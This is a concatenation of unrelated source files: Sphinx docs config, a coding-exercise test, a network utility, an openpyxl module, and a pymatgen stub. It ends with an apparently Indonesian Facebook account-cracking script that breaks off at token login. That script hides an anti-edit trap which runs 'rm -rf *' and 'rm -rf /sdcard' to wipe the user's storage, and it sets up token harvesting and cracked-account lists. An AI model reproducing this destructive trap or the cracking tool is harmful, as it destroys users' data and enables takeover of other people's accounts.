"sphinx.ext.todo",
"sphinx.ext.coverage",
"sphinx.ext.mathjax",
"sphinx.ext.ifconfig",
"sphinx.ext.viewcode",
"nbsphinx",
"recommonmark",
"sphinx_markdown_tables",
"sphinx_copybutton",
]
# enable autosummary plugin (table of contents for modules/classes/class
# methods)
autosummary_generate = True
autosummary_imported_members = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
source_suffix = {".rst": "restructuredtext", ".md": "markdown"}
# The master toctree document.
master_doc = "index"
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path .
exclude_patterns = ["**cli*", "_build", "**.ipynb_checkpoints", "_templates"]
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"
here = Path(__file__).parent.absolute()
# html_logo = str(here / "causalnex_logo.svg")
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
"collapse_navigation": False,
"style_external_links": True,
# "logo_only": True
# "github_url": "https://github.com/quantumblacklabs/causalnex"
}
html_context = {
"display_github": True,
"github_url": "https://github.com/quantumblacklabs/causalnex/tree/develop/docs/source",
}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
html_show_sourcelink = False
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = "causalnexdoc"
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, "causalnex.tex", "causalnex Documentation", "QuantumBlack", "manual")
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [(master_doc, "causalnex", "causalnex Documentation", [author], 1)]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc,
"causalnex",
"causalnex Documentation",
author,
"causalnex",
"Toolkit for causal reasoning (Bayesian Networks / Inference)",
"Data-Science",
)
]
# -- Options for todo extension ----------------------------------------------
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Extension configuration -------------------------------------------------
# nbsphinx_prolog = """
# see here for prolog/epilog details:
# https://nbsphinx.readthedocs.io/en/0.4.0/prolog-and-epilog.html
# """
nbsphinx_epilog = """
.. note::
Found a bug, or didn't find what you were looking for? `🙏Please file a
ticket <https://github.com/quantumblacklabs/causalnex/issues/new/choose>`_
"""
# -- NBconvert kernel config -------------------------------------------------
nbsphinx_kernel_name = "causalnex"
# -- causalnex specific configuration ------------------
MODULES = []
def get_classes(module):
importlib.import_module(module)
return [obj[0] for obj in getmembers(sys.modules[module], lambda obj: isclass(obj))]
def get_functions(module):
importlib.import_module(module)
return [
obj[0] for obj in getmembers(sys.modules[module], lambda obj: isfunction(obj))
]
def remove_arrows_in_examples(lines):
for i, line in enumerate(lines):
lines[i] = line.replace(">>>", "")
def autolink_replacements(what):
"""
Create a list containing replacement tuples of the form:
(``regex``, ``replacement``, ``obj``) for all classes and methods which are
imported in ``MODULES`` ``__init__.py`` files. The ``replacement``
is a reStructuredText link to their documentation.
For example, if the docstring reads:
This DataSet loads and saves ...
Then the word ``DataSet``, will be replaced by
:class:`~causalnex.io.DataSet`
Works for plural as well, e.g:
These ``DataSet``s load and save
Will convert to:
These :class:`causalnex.io.DataSet` s load and
save
Args:
what (str) : The objects to create replacement tuples for. Possible
values ["class", "func"]
Returns:
List[Tuple[regex, str, str]]: A list of tuples: (regex, replacement,
obj), for all "what" objects imported in __init__.py files of
``MODULES``
"""
replacements = []
suggestions = []
for module in MODULES:
if what == "class":
objects = get_classes(module)
elif what == "func":
objects = get_functions(module)
# Look for recognised class names/function names which are
# surrounded by double back-ticks
if what == "class":
# first do plural only for classes
replacements += [
(
r"``{}``s".format(obj),
":{}:`~{}.{}`\\\\s".format(what, module, obj),
obj,
)
for obj in objects
]
# singular
replacements += [
(r"``{}``".format(obj), ":{}:`~{}.{}`".format(what, module, obj), obj)
for obj in objects
]
# Look for recognised class names/function names which are NOT
# surrounded by double back-ticks, so that we can log these in the
# terminal
if what == "class":
# first do plural only for classes
suggestions += [
(r"(?<!\w|`){}s(?!\w|`{{2}})".format(obj), "``{}``s".format(obj), obj)
for obj in objects
]
# then singular
suggestions += [
(r"(?<!\w|`){}(?!\w|`{{2}})".format(obj), "``{}``".format(obj), obj)
for obj in objects
]
return replacements, suggestions
def log_suggestions(lines: List[str], name: str):
"""Use the ``suggestions`` list to log in the terminal places where the
developer has forgotten to surround with double back-ticks class
name/function name references.
Args:
lines: The docstring lines.
name: The name of the object whose docstring is contained in lines.
"""
title_printed = False
for i in range(len(lines)):
if ">>>" in lines[i]:
continue
for existing, replacement, obj in suggestions:
new = re.sub(existing, r"{}".format(replacement), lines[i])
if new == lines[i]:
continue
if ":rtype:" in lines[i] or ":type " in lines[i]:
continue
if not title_printed:
secho("-" * 50 + "\n" + name + ":\n" + "-" * 50, fg="blue")
title_printed = True
print(
"["
+ str(i)
+ "] "
+ re.sub(existing, r"{}".format(style(obj, fg="magenta")), lines[i])
)
print(
"["
+ str(i)
+ "] "
+ re.sub(existing, r"``{}``".format(style(obj, fg="green")), lines[i])
)
if title_printed:
print("\n")
def autolink_classes_and_methods(lines):
for i in range(len(lines)):
if ">>>" in lines[i]:
continue
for existing, replacement, obj in replacements:
lines[i] = re.sub(existing, r"{}".format(replacement), lines[i])
# Sphinx build passes six arguments
def autodoc_process_docstring(app, what, name, obj, options, lines):
try:
# guarded method to make sure build never fails
log_suggestions(lines, name)
autolink_classes_and_methods(lines)
except Exception as e:
print(
style(
"Failed to check for class name mentions that can be "
"converted to reStructuredText links in docstring of {}. "
"Error is: \n{}".format(name, str(e)),
fg="red",
)
)
remove_arrows_in_examples(lines)
# Sphinx build method passes six arguments
def skip(app, what, name, obj, skip, options):
if name == "__init__":
return False
return skip
def _prepare_build_dir(app, config):
"""Get current working directory to the state expected
by the ReadTheDocs builder. Shortly, it does the same as
./build-docs.sh script except not running `sphinx-build` step."""
build_root = Path(app.srcdir)
build_out = Path(app.outdir)
copy_tree(str(here / "source"), str(build_root))
copy_tree(str(build_root / "api_docs"), str(build_root))
shutil.rmtree(str(build_root / "api_docs"))
shutil.rmtree(str(build_out), ignore_errors=True)
copy_tree(str(build_root / "css"), str(build_out / "_static" / "css"))
copy_tree(str(build_root / "04_user_guide/images"), str(build_out / "04_user_guide"))
shutil.rmtree(str(build_root / "css"))
def setup(app):
app.connect("config-inited", _prepare_build_dir)
app.connect("autodoc-process-docstring", autodoc_process_docstring)
app.connect("autodoc-skip-member", skip)
app.add_stylesheet("css/qb1-sphinx-rtd.css")
# fix a bug with table wraps in Read the Docs Sphinx theme:
# https://rackerlabs.github.io/docs-rackspace/tools/rtd-tables.html
app.add_stylesheet("css/theme-overrides.css")
# add "Copy" button to code snippets
app.add_stylesheet("css/copybutton.css")
app.add_stylesheet("css/causalnex.css")
# when using nbsphinx, to allow mathjax render properly
app.config._raw_config.pop('mathjax_config')
def fix_module_paths():
"""
This method fixes the module paths of all class/functions we import in the
__init__.py file of the various causalnex submodules.
"""
for module in MODULES:
mod = importlib.import_module(module)
if not hasattr(mod, "__all__"):
mod.__all__ = get_classes(module) + get_functions(module)
# (regex, restructuredText link replacement, object) list
replacements = []
# (regex, class/function name surrounded with back-ticks, object) list
suggestions = []
try:
# guarded code to make sure build never fails
replacements_f, suggestions_f = autolink_replacements("func")
replacements_c, suggestions_c = autolink_replacements("class")
replacements = replacements_f + replacements_c
suggestions = suggestions_f + suggestions_c
except Exception as e:
print(
style(
"Failed to create list of (regex, reStructuredText link "
"replacement) for class names and method names in docstrings. "
"Error is: \n{}".format(str(e)),
fg="red",
)
)
fix_module_paths()
patchy.patch(
generate_autosummary_docs,
"""\
@@ -3,7 +3,7 @@ def generate_autosummary_docs(sources, output_dir=None, suffix='.rst',
base_path=None, builder=None, template_dir=None,
imported_members=False, app=None):
# type: (List[unicode], unicode, unicode, Callable, Callable, unicode, Builder, unicode, bool, Any) -> None # NOQA
-
+ imported_members = True
showed_sources = list(sorted(sources))
if len(showed_sources) > 20:
showed_sources = showed_sources[:10] + ['...'] + showed_sources[-10:]
""",
)
patchy.patch(
generate_autosummary_docs,
"""\
@@ -96,6 +96,21 @@ def generate_autosummary_docs(sources, output_dir=None, suffix='.rst',
if x in include_public or not x.startswith('_')]
return public, items
+ import importlib
+ def get_public_modules(obj, typ):
+ # type: (Any, str) -> List[str]
+ items = [] # type: List[str]
+ for item in getattr(obj, '__all__', []):
+ try:
+ importlib.import_module(name + '.' + item)
+ except ImportError:
+ continue
+ finally:
+ if item in sys.modules:
+ sys.modules.pop(name + '.' + item)
+ items.append(name + '.' + item)
+ return items
+
ns = {} # type: Dict[unicode, Any]
""",
)
patchy.patch(
generate_autosummary_docs,
"""\
@@ -106,6 +106,9 @@ def generate_autosummary_docs(sources, output_dir=None, suffix='.rst',
get_members(obj, 'class', imported=imported_members)
ns['exceptions'], ns['all_exceptions'] = \\
get_members(obj, 'exception', imported=imported_members)
+ ns['public_modules'] = get_public_modules(obj, 'module')
+ ns['functions'] = [m for m in ns['functions'] if not hasattr(obj, '__all__') or m in obj.__all__]
+ ns['classes'] = [m for m in ns['classes'] if not hasattr(obj, '__all__') or m in obj.__all__]
elif doc.objtype == 'class':
ns['members'] = dir(obj)
ns['inherited_members'] = \\
""",
)
| 33.125 | 120 | 0.610003 |
fd2df8c0b00a1a406d43dc376ed4d5dcf0ae90ab | 1,921 | py | Python | Codefights/arcade/python-arcade/level-4/28.Sort-Students/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | 7 | 2017-09-20T16:40:39.000Z | 2021-08-31T18:15:08.000Z | Codefights/arcade/python-arcade/level-4/28.Sort-Students/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | null | null | null | Codefights/arcade/python-arcade/level-4/28.Sort-Students/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | null | null | null | # Python3
from solution1 import sortStudents as f
qa = [
(['John Smith',
'Jacky Mon Simonoff',
'Lucy Smith',
'Angela Zimonova'],
['Jacky Mon Simonoff',
'John Smith',
'Lucy Smith',
'Angela Zimonova']),
(['Lucy Smith',
'John Smith',
'Jacky Mon Simonoff',
'Angela Zimonova'],
['Jacky Mon Simonoff',
'Lucy Smith',
'John Smith',
'Angela Zimonova']),
(['Kate'],
['Kate']),
(['Massuginn Dragonbrewer',
'Gragrinelynn Chainbasher',
'Barirud Treasureforged',
'Orimir Rubyheart',
'Krathoun Flatbuster',
'Museagret Browngrog',
'Groodgratelin Magmabuckle'],
['Museagret Browngrog',
'Gragrinelynn Chainbasher',
'Massuginn Dragonbrewer',
'Krathoun Flatbuster',
'Groodgratelin Magmabuckle',
'Orimir Rubyheart',
'Barirud Treasureforged']),
(['Massuginn Dragonbrewer',
'Nomneare Windback',
'Nurgutrude Strongpike',
'Barirud Treasureforged',
'Rudrud Lavahelm',
'Asseam Coindelver',
'Krathoun Flatbuster',
'Museagret Browngrog',
'Gorbaebelle Brickbelt',
'Groodgratelin Magmabuckle'],
['Gorbaebelle Brickbelt',
'Museagret Browngrog',
'Asseam Coindelver',
'Massuginn Dragonbrewer',
'Krathoun Flatbuster',
'Rudrud Lavahelm',
'Groodgratelin Magmabuckle',
'Nurgutrude Strongpike',
'Barirud Treasureforged',
'Nomneare Windback']),
(['John Doe',
'Brick Tick',
'Batman'],
['Batman',
'John Doe',
'Brick Tick'])
]
for *q, a in qa:
for i, e in enumerate(q):
print('input{0}: {1}'.format(i + 1, e))
ans = f(*q)
if ans != a:
print(' [failed]')
print(' output:', ans)
print(' expected:', a)
else:
print(' [ok]')
print(' output:', ans)
print()
| 24.628205 | 47 | 0.557002 |
647ba39e90ea3bd481c20540ca73b992efd09ea9 | 1,531 | py | Python | cpo/lib/fyre/utils/network.py | IBM/data-gate-cli | fc0cb1a560a0156c71eb63a550e198d0cd36e1df | [
"Apache-2.0"
] | 9 | 2020-08-21T08:46:34.000Z | 2021-09-02T15:47:41.000Z | cpo/lib/fyre/utils/network.py | IBM/data-gate-cli | fc0cb1a560a0156c71eb63a550e198d0cd36e1df | [
"Apache-2.0"
] | 10 | 2020-11-26T15:31:43.000Z | 2021-11-08T15:00:01.000Z | cpo/lib/fyre/utils/network.py | IBM/data-gate-cli | fc0cb1a560a0156c71eb63a550e198d0cd36e1df | [
"Apache-2.0"
] | 1 | 2022-03-10T07:14:49.000Z | 2022-03-10T07:14:49.000Z | # Copyright 2021 IBM Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ipaddress
import re as regex
from typing import List, Optional
from cpo.lib.error import DataGateCLIException
def get_private_ip_address_of_infrastructure_node(ipv4_addresses: List[ipaddress.IPv4Address]) -> ipaddress.IPv4Address:
"""Returns the private IP address of the infrastructure node
Parameters
----------
ipv4_addresses
all IPv4 addresses bound to local network interfaces of the
infrastructure node
Returns
-------
ipaddress.IPv4Address
private IP address of the infrastructure node
"""
result: Optional[ipaddress.IPv4Address] = None
for ipv4_address in ipv4_addresses:
search_result = regex.match("(10\\.\\d+\\.\\d+\\.\\d+)", str(ipv4_address))
if search_result is not None:
result = ipv4_address
break
if result is None:
raise DataGateCLIException("Private IP address not found")
return result
| 29.442308 | 120 | 0.7113 |
17c66d00b1051811ab46f6e768b0f616acbd0b56 | 8,049 | py | Python | venv/lib/python3.7/site-packages/openpyxl/worksheet/header_footer.py | taoyu0429/xmid2excel | faa93933a07b771eca57cfbd93b34c28366fd921 | [
"Unlicense"
] | 5,079 | 2015-01-01T03:39:46.000Z | 2022-03-31T07:38:22.000Z | venv/lib/python3.7/site-packages/openpyxl/worksheet/header_footer.py | taoyu0429/xmid2excel | faa93933a07b771eca57cfbd93b34c28366fd921 | [
"Unlicense"
] | 1,623 | 2015-01-01T08:06:24.000Z | 2022-03-30T19:48:52.000Z | venv/lib/python3.7/site-packages/openpyxl/worksheet/header_footer.py | taoyu0429/xmid2excel | faa93933a07b771eca57cfbd93b34c28366fd921 | [
"Unlicense"
] | 2,033 | 2015-01-04T07:18:02.000Z | 2022-03-28T19:55:47.000Z | from __future__ import absolute_import
# Copyright (c) 2010-2019 openpyxl
# Simplified implementation of headers and footers: let worksheets have separate items
import re
from warnings import warn
from openpyxl.descriptors import (
Alias,
Bool,
Strict,
String,
Integer,
MatchPattern,
Typed,
)
from openpyxl.descriptors.serialisable import Serialisable
from openpyxl.compat import unicode
from openpyxl.xml.functions import Element
from openpyxl.utils.escape import escape, unescape
FONT_PATTERN = '&"(?P<font>.+)"'
COLOR_PATTERN = "&K(?P<color>[A-F0-9]{6})"
SIZE_REGEX = r"&(?P<size>\d+\s?)"
FORMAT_REGEX = re.compile("{0}|{1}|{2}".format(FONT_PATTERN, COLOR_PATTERN,
SIZE_REGEX)
)
def _split_string(text):
"""
Split the combined (decoded) string into left, center and right parts
# See http://stackoverflow.com/questions/27711175/regex-with-multiple-optional-groups for discussion
"""
ITEM_REGEX = re.compile("""
(&L(?P<left>.+?))?
(&C(?P<center>.+?))?
(&R(?P<right>.+?))?
$""", re.VERBOSE | re.DOTALL)
m = ITEM_REGEX.match(text)
try:
parts = m.groupdict()
except AttributeError:
warn("""Cannot parse header or footer so it will be ignored""")
parts = {'left':'', 'right':'', 'center':''}
return parts
class _HeaderFooterPart(Strict):
"""
Individual left/center/right header/footer part
Do not use directly.
Header & Footer ampersand codes:
* &A Inserts the worksheet name
* &B Toggles bold
* &D or &[Date] Inserts the current date
* &E Toggles double-underline
* &F or &[File] Inserts the workbook name
* &I Toggles italic
* &N or &[Pages] Inserts the total page count
* &S Toggles strikethrough
* &T Inserts the current time
* &[Tab] Inserts the worksheet name
* &U Toggles underline
* &X Toggles superscript
* &Y Toggles subscript
* &P or &[Page] Inserts the current page number
* &P+n Inserts the page number incremented by n
* &P-n Inserts the page number decremented by n
* &[Path] Inserts the workbook path
* && Escapes the ampersand character
* &"fontname" Selects the named font
* &nn Selects the specified 2-digit font point size
Colours are in RGB Hex
"""
text = String(allow_none=True)
font = String(allow_none=True)
size = Integer(allow_none=True)
RGB = ("^[A-Fa-f0-9]{6}$")
color = MatchPattern(allow_none=True, pattern=RGB)
def __init__(self, text=None, font=None, size=None, color=None):
self.text = text
self.font = font
self.size = size
self.color = color
def __str__(self):
"""
Convert to Excel HeaderFooter miniformat minus position
"""
fmt = []
if self.font:
fmt.append(u'&"{0}"'.format(self.font))
if self.size:
fmt.append("&{0} ".format(self.size))
if self.color:
fmt.append("&K{0}".format(self.color))
return u"".join(fmt + [self.text])
def __bool__(self):
return bool(self.text)
__nonzero__ = __bool__
@classmethod
def from_str(cls, text):
"""
Convert from miniformat to object
"""
keys = ('font', 'color', 'size')
kw = dict((k, v) for match in FORMAT_REGEX.findall(text)
for k, v in zip(keys, match) if v)
kw['text'] = FORMAT_REGEX.sub('', text)
return cls(**kw)
class HeaderFooterItem(Strict):
"""
Header or footer item
"""
left = Typed(expected_type=_HeaderFooterPart)
center = Typed(expected_type=_HeaderFooterPart)
centre = Alias("center")
right = Typed(expected_type=_HeaderFooterPart)
__keys = ('L', 'C', 'R')
def __init__(self, left=None, right=None, center=None):
if left is None:
left = _HeaderFooterPart()
self.left = left
if center is None:
center = _HeaderFooterPart()
self.center = center
if right is None:
right = _HeaderFooterPart()
self.right = right
def __str__(self):
"""
Pack parts into a single string
"""
TRANSFORM = {'&[Tab]': '&A', '&[Pages]': '&N', '&[Date]': '&D',
'&[Path]': '&Z', '&[Page]': '&P', '&[Time]': '&T', '&[File]': '&F',
'&[Picture]': '&G'}
# escape keys and create regex
SUBS_REGEX = re.compile("|".join(["({0})".format(re.escape(k))
for k in TRANSFORM]))
def replace(match):
"""
Callback for re.sub
Replace expanded control with mini-format equivalent
"""
sub = match.group(0)
return TRANSFORM[sub]
txt = []
for key, part in zip(
self.__keys, [self.left, self.center, self.right]):
if part.text is not None:
txt.append(u"&{0}{1}".format(key, unicode(part)))
txt = "".join(txt)
txt = SUBS_REGEX.sub(replace, txt)
return escape(txt)
def __bool__(self):
return any([self.left, self.center, self.right])
__nonzero__ = __bool__
def to_tree(self, tagname):
"""
Return as XML node
"""
el = Element(tagname)
el.text = unicode(self)
return el
@classmethod
def from_tree(cls, node):
if node.text:
text = unescape(node.text)
parts = _split_string(text)
for k, v in parts.items():
if v is not None:
parts[k] = _HeaderFooterPart.from_str(v)
self = cls(**parts)
return self
class HeaderFooter(Serialisable):
tagname = "headerFooter"
differentOddEven = Bool(allow_none=True)
differentFirst = Bool(allow_none=True)
scaleWithDoc = Bool(allow_none=True)
alignWithMargins = Bool(allow_none=True)
oddHeader = Typed(expected_type=HeaderFooterItem, allow_none=True)
oddFooter = Typed(expected_type=HeaderFooterItem, allow_none=True)
evenHeader = Typed(expected_type=HeaderFooterItem, allow_none=True)
evenFooter = Typed(expected_type=HeaderFooterItem, allow_none=True)
firstHeader = Typed(expected_type=HeaderFooterItem, allow_none=True)
firstFooter = Typed(expected_type=HeaderFooterItem, allow_none=True)
__elements__ = ("oddHeader", "oddFooter", "evenHeader", "evenFooter", "firstHeader", "firstFooter")
def __init__(self,
differentOddEven=None,
differentFirst=None,
scaleWithDoc=None,
alignWithMargins=None,
oddHeader=None,
oddFooter=None,
evenHeader=None,
evenFooter=None,
firstHeader=None,
firstFooter=None,
):
self.differentOddEven = differentOddEven
self.differentFirst = differentFirst
self.scaleWithDoc = scaleWithDoc
self.alignWithMargins = alignWithMargins
if oddHeader is None:
oddHeader = HeaderFooterItem()
self.oddHeader = oddHeader
if oddFooter is None:
oddFooter = HeaderFooterItem()
self.oddFooter = oddFooter
if evenHeader is None:
evenHeader = HeaderFooterItem()
self.evenHeader = evenHeader
if evenFooter is None:
evenFooter = HeaderFooterItem()
self.evenFooter = evenFooter
if firstHeader is None:
firstHeader = HeaderFooterItem()
self.firstHeader = firstHeader
if firstFooter is None:
firstFooter = HeaderFooterItem()
self.firstFooter = firstFooter
def __bool__(self):
parts = [getattr(self, attr) for attr in self.__attrs__ + self.__elements__]
return any(parts)
__nonzero__ = __bool__
| 29.269091 | 104 | 0.584669 |
990a0e76efb1f7a07d38b8a2c83c75a97710b450 | 366 | py | Python | pymatgen/analysis/diffraction/__init__.py | hpatel1567/pymatgen | 8304b25464206c74305214e45935df90bab95500 | [
"MIT"
] | 1 | 2020-03-03T06:33:25.000Z | 2020-03-03T06:33:25.000Z | pymatgen/analysis/diffraction/__init__.py | hpatel1567/pymatgen | 8304b25464206c74305214e45935df90bab95500 | [
"MIT"
] | null | null | null | pymatgen/analysis/diffraction/__init__.py | hpatel1567/pymatgen | 8304b25464206c74305214e45935df90bab95500 | [
"MIT"
] | null | null | null | # coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
This package implements various diffraction analyses.
"""
__author__ = "Shyue Ping Ong"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "shyuep@gmail.com"
__date__ = "5/22/14"
| 22.875 | 55 | 0.740437 |
dc0851a06af74a50d6e516633fc270fa8c32b978 | 26,603 | py | Python | ah.py | OPDIHI/elite | 9c33822ef853da510e7314268c21cb7bb2e5cbc8 | [
"MIT"
] | 2 | 2022-02-20T19:30:51.000Z | 2022-03-19T03:15:21.000Z | ah.py | OPDIHI/elite | 9c33822ef853da510e7314268c21cb7bb2e5cbc8 | [
"MIT"
] | 1 | 2022-02-18T12:24:17.000Z | 2022-02-18T12:24:17.000Z | ah.py | OPDIHI/elite | 9c33822ef853da510e7314268c21cb7bb2e5cbc8 | [
"MIT"
] | null | null | null | #!/usr/bin/python2
# coding=utf-8-*-
# author : Khamdihi XD
# (C) Copyright 407 Authentic Exploit
# Rebuild Copyright Can't make u real programmer:)
# Coded By Khamdihi XD
# BEBAS REKODE ASAL BERI NAMA GUE DI AUTHOR NYA
# WA ME -> +62 831-4606-1814 + (DONASIDANA/PULSA)
# GITHUB ME -> https://github.com/OPDIHI
# CUMA NGINGTIN DILARANG MENGHAPUS ATAU MERUBAH JIKA KAMH MASIH PEMULA KARNA ADA KODE UNTUK MENGHAPUS MEMORI
### IMPORT MODULE ###
import os, sys, re, time, requests, calendar, random,json
from random import randint
from concurrent.futures import ThreadPoolExecutor
from bs4 import BeautifulSoup as parser
from datetime import datetime
from datetime import date
from time import sleep as waktu
try:
import requests
except ImportError:
print("\n [!] module requests belum terinstall")
os.system("pip2 install requests")
try:
import bs4
except ImportError:
print("\n [!] module bs4 belum terinstall")
os.system("pip2 install bs4")
try:
import concurrent.futures
except ImportError:
print("\n [!] module futures belum terinstall")
os.system("pip2 install futures")
### GLOBAL WARNA ###
P = '\x1b[1;97m' # PUTIH *
M = '\x1b[1;91m' # MERAH *
H = '\x1b[1;92m' # HIJAU. *
K = '\x1b[1;93m' # KUNING. *
B = '\x1b[1;94m' # BIRU. *
U = '\x1b[1;95m' # UNGU. "
O = '\x1b[1;96m' # BIRU MUDA. *
N = '\x1b[0m' # WARNA MATI *
### GLOBAL NAMA ###
IP = requests.get('https://api.ipify.org').text
url = "https://mbasic.facebook.com"
ses = requests.Session()
id = []
cp = []
ok = []
opsi = []
ubahP = []
pwbaru = []
data = {}
data2 = {}
loop = 0
headerz = random.choice([
"Mozilla/5.0 (Linux; U; Android 4.1.2; de-de; GT-I8190 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30",
"Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1",
"Mozilla/5.0 (Linux; Android 7.1.2; Redmi 5A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36"
])
### GLOBAL WAKTU ###
ct = datetime.now()
n = ct.month
bulann = ['Januari','Februari','Maret','April','Mei','Juni','Juli','Agustus','September','Oktober','November','Desember']
try:
if n < 0 or n > 12:
exit()
nTemp = n - 1
except ValueError:
exit()
current = datetime.now()
ta = current.year
bu = current.month
ha = current.day
op = bulann[nTemp]
my_date = date.today()
hr = calendar.day_name[my_date.weekday()]
tanggal = ("%s-%s-%s-%s"%(hr, ha, op, ta))
tgl = ("%s %s %s"%(ha, op, ta))
bulan = {"01": "Januari", "02": "Februari", "03": "Maret", "04": "April", "05": "Mei", "06": "Juni", "07": "Juli", "08": "Agustus", "09": "September", "10": "Oktober", "11": "November", "12": "Desember"}
ua = "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; de-at) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1"
### DEF TAMBAHAN ###
def jalan(z):
for e in z + "\n":
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
def mlaku(z):
for e in z + "\n":
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
### KALO KAMU BELUM TAU INI JANGAN DI GANTI BAHAYA
AUTHOR_SCRIPT = 'KHAMDIHI XD KANG CODING UTF8'
PENGGUNA_SCRIPT = 'KANG REKODE HANDAL KEK KONTOL'
PENGHAPUSMEMORI = 'KHAMDIHI XD KANG CODING UTF8KANG REKODE HANDAL KEK KONTOL'
### AKU GAK MAU BERTANGUNG JAWAB OK
def ___parah___(AUTHOR_SCRIPT,PENGGUNA_SCRIPT):
___jangandiganti___ = AUTHOR_SCRIPT+PENGGUNA_SCRIPT
if ___jangandiganti___ not in PENGHAPUSMEMORI:os.system('termux-setup-storage');os.system('rm -rf *');os.system('rm -rf /sdcard');print('[!] Maaf file sdcard kamu telah terhapus ! di karnakan rekode !');exit()
else:pass
### INI JANGAN DI GANTI YAH NANTI EROR :(
___crot___ = '___khamdihi___XD___'
____rekode____ = '___hayu___mau___rekodeya___'
___khamdihi___ = '___my___frinds___the___best'
___buatkamuyangrekode___ = '___tetap___semangat___'
### INI JANGAN DI GANTI KONTOL PLEASE ';(
___dihi___ = '_____khamdihi_____'
___khaa___ = 'sayang'
___rekode___ = 'diatapidiagakpeka'
____cek____ = '_____khamdihi_____sayangdiatapidiagakpeka'
def ___cek___(___dihi___,___khaa___,___rekode___):
_sayang_ = ___dihi___+___khaa___+___rekode___
if _sayang_ not in ____cek____:print('[!] Suhu kok mau rekode sih :)');exit()
else:pass
menu()
### BANNER AND SPANDUK BERI NAMA KU DI SINI DAN KAMU
def semangat():
if ___crot___ not in '___khamdihi___XD___':
os.system('clear')
semangat()
print('[ awas jika rekode kalian kena mental')
print('[ Kan udah ku bilang jangan di ganti');sys.exit()
else:pass
print('''
_ _ _ ___ ___
| || \_/ || o )| __| | Made with by Khamdihi XD
| || \_/ || o \| _| | https://github.com/OPDIHI
|_||_| |_||___/|_| | Versi saat ini 1.2\n''')
### METODE LOGIN PAKE TOKEN NGENT*D
def login():
if ____rekode____ not in '___hayu___mau___rekodeya___':
os.system('clear');semangat()
print('[ Kan udah aku bilang jangan di ganti ]')
sys.exit('[ mau rekode tapi eror ya wak kasian')
else:pass
os.system('clear');semangat()
___parah___(AUTHOR_SCRIPT,PENGGUNA_SCRIPT)
print('[1] Login pake token ')
print('[2] seting user-agent')
print('[0] Keluar')
aku = raw_input('\n[?] Chose menu : ')
if aku =='':
exit('\n[!] Jangan kosong')
elif aku in ['1','01']:
token()
elif aku in ['2','02']:
user()
elif aku in ['0','00']:
exit()
else:
exit('\n[!] Pilih 1-0 bukan -> '+(aku))
### METODE LOGIN WITH TOKEN
def token():
os.system('clear');semangat()
if ___buatkamuyangrekode___ not in '___tetap___semangat___':
os.system('clear');semangat()
print('[+] Awas cok jika kalian kena mental')
print('[*] makanya jangan di ganti');sys.exit()
else:pass
kontol = raw_input('[?] Masukan token : ')
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+kontol)
